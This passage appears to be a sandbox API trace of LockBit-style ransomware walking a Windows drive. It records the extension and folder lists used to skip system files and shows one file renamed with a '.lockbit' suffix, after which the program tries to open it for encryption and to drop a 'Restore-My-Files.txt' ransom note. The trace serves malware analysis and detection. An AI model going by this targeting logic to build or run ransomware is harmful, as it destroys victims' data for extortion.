lstrcmpiW (lpString1=".bat", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".rom", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".msc", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".spl", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".ps1", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".msu", lpString2=".sys") returned -1 [0076.553] lstrcmpiW (lpString1=".ics", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".key", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".reg", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".idx", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0076.554] FindNextFileW (in: hFindFile=0x2e3190, lpFindFileData=0x344f568 | out: lpFindFileData=0x344f568*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa37fea60, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa37fea60, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x7e723be0, ftLastWriteTime.dwHighDateTime=0x1d87cc9, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0076.554] lstrcmpiW (lpString1=".", lpString2="pagefile.sys") returned -1 [0076.554] lstrcmpiW (lpString1="..", lpString2="pagefile.sys") returned -1 [0076.554] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0076.554] lstrcmpiW (lpString1=".386", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".ani", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".adv", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".theme", lpString2=".sys") returned 1 [0076.554] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".msp", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".com", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".diagpkg", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".nls", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".diagcab", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".lock", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".ocx", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".mpa", lpString2=".sys") returned -1 [0076.554] lstrcmpiW (lpString1=".cpl", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".mod", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".hta", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".icns", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".prf", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".rtp", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".diagcfg", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".msstyles", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".bin", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".hlp", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".shs", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".drv", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".wpx", lpString2=".sys") returned 1 [0076.555] lstrcmpiW (lpString1=".bat", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".rom", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".msc", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".spl", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".ps1", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".msu", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".ics", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".key", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".reg", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".idx", lpString2=".sys") returned -1 [0076.555] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0076.556] FindNextFileW (in: hFindFile=0x2e3190, lpFindFileData=0x344f568 | out: lpFindFileData=0x344f568*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0076.556] lstrcmpiW (lpString1=".", lpString2="PerfLogs") returned -1 [0076.556] lstrcmpiW (lpString1="..", lpString2="PerfLogs") returned -1 [0076.556] lstrcmpiW (lpString1="PerfLogs", lpString2="$windows.~bt") returned 1 [0076.556] lstrcmpiW (lpString1="PerfLogs", lpString2="intel") returned 1 [0076.556] lstrcmpiW (lpString1="PerfLogs", lpString2="msocache") returned 1 [0076.556] lstrcmpiW (lpString1="PerfLogs", lpString2="$recycle.bin") returned 1 [0076.556] lstrcmpiW (lpString1="PerfLogs", lpString2="$windows.~ws") returned 1 [0076.556] lstrcmpiW (lpString1="PerfLogs", lpString2="tor browser") returned -1 [0076.556] lstrcmpiW (lpString1="PerfLogs", lpString2="boot") returned 1 [0076.556] lstrcmpiW (lpString1="PerfLogs", lpString2="system volume information") returned -1 [0076.556] lstrcmpiW (lpString1="PerfLogs", lpString2="perflogs") returned 0 [0076.556] FindNextFileW (in: hFindFile=0x2e3190, lpFindFileData=0x344f568 | out: lpFindFileData=0x344f568*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xba0d6b70, ftLastAccessTime.dwHighDateTime=0x1d87cc9, ftLastWriteTime.dwLowDateTime=0xba0d6b70, ftLastWriteTime.dwHighDateTime=0x1d87cc9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0076.556] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.556] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.556] lstrcmpiW (lpString1="Program Files", lpString2="$windows.~bt") returned 1 [0076.556] lstrcmpiW (lpString1="Program Files", lpString2="intel") returned 1 [0076.556] lstrcmpiW (lpString1="Program Files", lpString2="msocache") returned 1 [0076.556] lstrcmpiW (lpString1="Program Files", lpString2="$recycle.bin") returned 1 [0076.556] lstrcmpiW (lpString1="Program Files", lpString2="$windows.~ws") returned 1 [0076.556] lstrcmpiW (lpString1="Program Files", lpString2="tor browser") returned -1 [0076.556] lstrcmpiW (lpString1="Program Files", lpString2="boot") returned 1 [0076.556] lstrcmpiW (lpString1="Program Files", lpString2="system volume information") returned -1 [0076.556] lstrcmpiW (lpString1="Program Files", lpString2="perflogs") returned 1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="google") returned 1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="application data") returned 1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="windows") returned -1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="windows.old") returned -1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="appdata") returned 1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="Windows nt") returned -1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="Msbuild") returned 1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="Microsoft") returned 1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="All users") returned 1 [0076.557] lstrcmpiW (lpString1="Program Files", lpString2="mozilla") returned 1 [0076.557] wsprintfW (in: param_1=0x344f080, param_2="%s\\%s" | out: param_1="C:\\\\Program Files") returned 17 [0076.557] wsprintfW (in: param_1=0x344e8e0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\*") returned 19 [0076.557] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\*" (normalized: "c:\\program files\\*"), fInfoLevelId=0x0, lpFindFileData=0x344edc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344edc8) returned 0x2e3050 [0076.557] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.557] FindNextFileW (in: hFindFile=0x2e3050, lpFindFileData=0x344edc8 | out: lpFindFileData=0x344edc8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xba0d6b70, ftLastAccessTime.dwHighDateTime=0x1d87cc9, ftLastWriteTime.dwLowDateTime=0xba0d6b70, ftLastWriteTime.dwHighDateTime=0x1d87cc9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd29f5adc, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0076.557] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.558] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.558] FindNextFileW (in: hFindFile=0x2e3050, lpFindFileData=0x344edc8 | out: lpFindFileData=0x344edc8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb3e0da70, ftLastAccessTime.dwHighDateTime=0x1d87cc9, ftLastWriteTime.dwLowDateTime=0xb3e0da70, ftLastWriteTime.dwHighDateTime=0x1d87cc9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd29f5adc, dwReserved1=0x1ca0431, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0076.558] lstrcmpiW (lpString1=".", lpString2="Common Files") returned -1 [0076.558] lstrcmpiW (lpString1="..", lpString2="Common Files") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="$windows.~bt") returned 1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="intel") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="msocache") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="$recycle.bin") returned 1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="$windows.~ws") returned 1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="tor browser") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="boot") returned 1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="system volume information") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="perflogs") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="google") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="application data") returned 1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="windows") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="windows.old") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="appdata") returned 1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="Windows nt") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="Msbuild") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="Microsoft") returned -1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="All users") returned 1 [0076.558] lstrcmpiW (lpString1="Common Files", lpString2="mozilla") returned -1 [0076.558] wsprintfW (in: param_1=0x344e8e0, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files") returned 30 [0076.558] wsprintfW (in: param_1=0x344e140, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\*") returned 32 [0076.559] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\*" (normalized: "c:\\program files\\common files\\*"), fInfoLevelId=0x0, lpFindFileData=0x344e628, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344e628) returned 0x2e31d0 [0076.559] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.559] FindNextFileW (in: hFindFile=0x2e31d0, lpFindFileData=0x344e628 | out: lpFindFileData=0x344e628*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb3e0da70, ftLastAccessTime.dwHighDateTime=0x1d87cc9, ftLastWriteTime.dwLowDateTime=0xb3e0da70, ftLastWriteTime.dwHighDateTime=0x1d87cc9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd72e458, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0076.559] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.559] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.559] FindNextFileW (in: hFindFile=0x2e31d0, lpFindFileData=0x344e628 | out: lpFindFileData=0x344e628*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9925270, ftCreationTime.dwHighDateTime=0x1d86d33, ftLastAccessTime.dwLowDateTime=0x2db90830, ftLastAccessTime.dwHighDateTime=0x1d87cb7, ftLastWriteTime.dwLowDateTime=0x2db90830, ftLastWriteTime.dwHighDateTime=0x1d87cb7, nFileSizeHigh=0x0, nFileSizeLow=0x133a2, dwReserved0=0xfd72e458, dwReserved1=0x1ca0431, cFileName="44-vnbkTRNEu.gif", cAlternateFileName="44-VNB~1.GIF")) returned 1 [0076.559] lstrcmpiW (lpString1=".", lpString2="44-vnbkTRNEu.gif") returned -1 [0076.559] lstrcmpiW (lpString1="..", lpString2="44-vnbkTRNEu.gif") returned -1 [0076.559] PathFindExtensionW (pszPath="44-vnbkTRNEu.gif") returned=".gif" [0076.559] lstrcmpiW (lpString1=".386", lpString2=".gif") returned -1 [0076.559] lstrcmpiW (lpString1=".cmd", lpString2=".gif") returned -1 [0076.559] lstrcmpiW (lpString1=".exe", lpString2=".gif") returned -1 [0076.559] lstrcmpiW (lpString1=".ani", lpString2=".gif") returned -1 [0076.559] lstrcmpiW (lpString1=".adv", lpString2=".gif") returned -1 [0076.559] lstrcmpiW (lpString1=".theme", lpString2=".gif") returned 1 [0076.559] lstrcmpiW (lpString1=".msi", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".msp", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".com", lpString2=".gif") returned -1 [0076.560] lstrcmpiW (lpString1=".diagpkg", lpString2=".gif") returned -1 [0076.560] lstrcmpiW (lpString1=".nls", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".diagcab", lpString2=".gif") returned -1 [0076.560] lstrcmpiW (lpString1=".lock", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".ocx", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".mpa", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".cpl", lpString2=".gif") returned -1 [0076.560] lstrcmpiW (lpString1=".mod", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".hta", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".icns", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".prf", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".rtp", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".diagcfg", lpString2=".gif") returned -1 [0076.560] lstrcmpiW (lpString1=".msstyles", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".bin", lpString2=".gif") returned -1 [0076.560] lstrcmpiW (lpString1=".hlp", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".shs", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".drv", lpString2=".gif") returned -1 [0076.560] lstrcmpiW (lpString1=".wpx", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".bat", lpString2=".gif") returned -1 [0076.560] lstrcmpiW (lpString1=".rom", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".msc", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".spl", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".ps1", lpString2=".gif") returned 1 [0076.560] lstrcmpiW (lpString1=".msu", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".ics", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".key", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".mp3", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".reg", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".dll", lpString2=".gif") returned -1 [0076.561] lstrcmpiW (lpString1=".ini", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".idx", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".sys", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".hlp", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".ico", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".lnk", lpString2=".gif") returned 1 [0076.561] lstrcmpiW (lpString1=".rdp", lpString2=".gif") returned 1 [0076.561] wsprintfW (in: param_1=0x344e560, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0076.561] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="44-vnbkTRNEu.gif") returned 1 [0076.561] lstrcmpiW (lpString1="ntldr", lpString2="44-vnbkTRNEu.gif") returned 1 [0076.561] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="44-vnbkTRNEu.gif") returned 1 [0076.561] lstrcmpiW (lpString1="bootsect.bak", lpString2="44-vnbkTRNEu.gif") returned 1 [0076.561] lstrcmpiW (lpString1="autorun.inf", lpString2="44-vnbkTRNEu.gif") returned 1 [0076.561] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files" | out: pszPath="C:\\\\Program Files\\Common Files\\") returned="" [0076.562] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\44-vnbkTRNEu.gif") returned=".gif" [0076.562] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0076.562] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0076.562] lstrcmpiW (lpString1=".7z", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".ckp", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".dacpac", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".db", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".db-shm", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".db-wal", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".db3", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".dbc", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".dbs", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".dbt", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".dbv", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".frm", lpString2=".gif") returned -1 [0076.562] lstrcmpiW (lpString1=".mdf", lpString2=".gif") returned 1 [0076.562] lstrcmpiW (lpString1=".mrg", lpString2=".gif") returned 1 [0076.562] lstrcmpiW (lpString1=".mwb", lpString2=".gif") returned 1 [0076.562] lstrcmpiW (lpString1=".myd", lpString2=".gif") returned 1 [0076.562] lstrcmpiW (lpString1=".ndf", lpString2=".gif") returned 1 [0076.562] lstrcmpiW (lpString1=".qry", lpString2=".gif") returned 1 [0076.562] lstrcmpiW (lpString1=".sdb", lpString2=".gif") returned 1 [0076.562] lstrcmpiW (lpString1=".sdf", lpString2=".gif") returned 1 [0076.563] lstrcmpiW (lpString1=".sql", lpString2=".gif") returned 1 [0076.563] lstrcmpiW (lpString1=".sqlite", lpString2=".gif") returned 1 [0076.563] lstrcmpiW (lpString1=".sqlite3", lpString2=".gif") returned 1 [0076.563] lstrcmpiW (lpString1=".sqlitedb", lpString2=".gif") returned 1 [0076.563] lstrcmpiW (lpString1=".tmd", lpString2=".gif") returned 1 [0076.563] wsprintfW (in: param_1=0x344dd00, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\44-vnbkTRNEu.gif.lockbit") returned 55 [0076.563] lstrcmpiW (lpString1=".gif", lpString2=".lockbit") returned -1 [0076.563] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\44-vnbkTRNEu.gif" (normalized: "c:\\program files\\common files\\44-vnbktrneu.gif"), lpNewFileName="C:\\\\Program Files\\Common Files\\44-vnbkTRNEu.gif.lockbit" (normalized: "c:\\program files\\common files\\44-vnbktrneu.gif.lockbit")) returned 1 [0076.567] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\44-vnbkTRNEu.gif.lockbit" (normalized: "c:\\program files\\common files\\44-vnbktrneu.gif.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x394 [0076.568] CreateIoCompletionPort (FileHandle=0x394, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.568] malloc (_Size=0x40068) returned 0x206b860 [0076.569] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=78754) returned 1 [0076.569] ReadFile (in: hFile=0x394, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0076.618] GetLastError () returned 0x3e5 [0076.619] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\44-vnbkTRNEu.gif" | out: pszPath="C:\\\\Program Files\\Common Files") returned 1 [0076.619] wsprintfW (in: param_1=0x344dab8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Restore-My-Files.txt") returned 51 [0076.619] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x394 [0076.620] CreateIoCompletionPort (FileHandle=0x394, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.620] malloc (_Size=0x40068) returned 0x206b860 [0076.620] WriteFile (in: hFile=0x394, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0076.628] GetLastError () returned 0x3e5 [0076.628] FindNextFileW (in: hFindFile=0x2e31d0, lpFindFileData=0x344e628 | out: lpFindFileData=0x344e628*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f68cab0, ftCreationTime.dwHighDateTime=0x1d82a42, ftLastAccessTime.dwLowDateTime=0x50b42cf0, ftLastAccessTime.dwHighDateTime=0x1d86b84, ftLastWriteTime.dwLowDateTime=0x50b42cf0, ftLastWriteTime.dwHighDateTime=0x1d86b84, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xfd72e458, dwReserved1=0x1ca0431, cFileName="active-charge.exe", cAlternateFileName="ACTIVE~1.EXE")) returned 1 [0076.628] lstrcmpiW (lpString1=".", lpString2="active-charge.exe") returned -1 [0076.628] lstrcmpiW (lpString1="..", lpString2="active-charge.exe") returned -1 [0076.628] PathFindExtensionW (pszPath="active-charge.exe") returned=".exe" [0076.628] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0076.628] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0076.628] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0076.628] FindNextFileW (in: hFindFile=0x2e31d0, lpFindFileData=0x344e628 | out: lpFindFileData=0x344e628*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9157b510, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x9157b510, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd72e458, dwReserved1=0x1ca0431, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0076.628] lstrcmpiW (lpString1=".", lpString2="Microsoft Shared") returned -1 [0076.628] lstrcmpiW (lpString1="..", lpString2="Microsoft Shared") returned -1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="$windows.~bt") returned 1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="intel") returned 1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="msocache") returned -1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="$recycle.bin") returned 1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="$windows.~ws") returned 1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="tor browser") returned -1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="boot") returned 1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="system volume information") returned -1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="perflogs") returned -1 [0076.628] lstrcmpiW (lpString1="Microsoft Shared", lpString2="google") returned 1 [0076.629] lstrcmpiW (lpString1="Microsoft Shared", lpString2="application data") returned 1 [0076.629] lstrcmpiW (lpString1="Microsoft Shared", lpString2="windows") returned -1 [0076.629] lstrcmpiW (lpString1="Microsoft Shared", lpString2="windows.old") returned -1 [0076.629] lstrcmpiW (lpString1="Microsoft Shared", lpString2="appdata") returned 1 [0076.629] lstrcmpiW (lpString1="Microsoft Shared", lpString2="Windows nt") returned -1 [0076.629] lstrcmpiW (lpString1="Microsoft Shared", lpString2="Msbuild") returned -1 [0076.629] lstrcmpiW (lpString1="Microsoft Shared", lpString2="Microsoft") returned 1 [0076.629] lstrcmpiW (lpString1="Microsoft Shared", lpString2="All users") returned 1 [0076.629] lstrcmpiW (lpString1="Microsoft Shared", lpString2="mozilla") returned -1 [0076.629] wsprintfW (in: param_1=0x344e140, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared") returned 47 [0076.629] wsprintfW (in: param_1=0x344d9a0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\*") returned 49 [0076.629] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\*"), fInfoLevelId=0x0, lpFindFileData=0x344de88, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344de88) returned 0x2e3210 [0076.629] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.629] FindNextFileW (in: hFindFile=0x2e3210, lpFindFileData=0x344de88 | out: lpFindFileData=0x344de88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9157b510, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x9157b510, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0076.629] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.630] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.630] FindNextFileW (in: hFindFile=0x2e3210, lpFindFileData=0x344de88 | out: lpFindFileData=0x344de88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x175dffd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x1817ab10, 